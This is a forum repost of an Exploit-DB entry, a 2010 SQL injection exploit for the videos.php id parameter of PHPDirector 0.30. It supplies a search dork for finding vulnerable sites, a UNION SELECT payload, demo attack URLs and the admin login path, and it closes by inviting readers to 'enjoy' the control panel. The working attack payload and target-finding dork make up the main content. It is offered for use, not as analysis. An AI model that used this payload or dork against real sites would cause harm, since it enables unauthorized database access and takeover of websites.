Exploit PHPDirector 0.30 - 'videos.php' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
14106
Проверка EDB
  1. Пройдено
Автор
MR-ABDOX
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2010-06-29
Код:
======================================================================
PHPDirector 0.30 (videos.php) SQL Injection Vulnerability #
======================================================================
# Date : 29/06/2010 #
# Author : Mr-AbdoX #
# Emails : [email protected] & [email protected] #
# My web Sites : http://Sec-Eviles.com/vb & http://Arspam.com/ #
# Script home : www.phpdirector.co.uk/ #
# Tested on : Linux & Windows #
=================Exploit============================================

Dork: [Powered by: PHPDirector 0.30] 0r [ inurl:videos.php?id= ]

[~] ExploiT [~]

http://www.site.com/videos.php?id=[SQL]

union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14--


[~] ConTroL Panel (admin login) [~]

http://www.site.com/login.php


[~] demo [~]


http://server/path/videos.php?id=-56+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14--

http://server/videos.php?id=-56+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14--

enjoy in control panel Like U WanT :p


Don't Forget greetz Me...

Peace


[~] GreetZ To [~]

The Invisible , Dr.Html , Mehdiz , Mr-Yasen , The S3r!0uS , Dr.Solo , ProF.Sellim & All Morrocans H4xorz
 
Источник
www.exploit-db.com

Похожие темы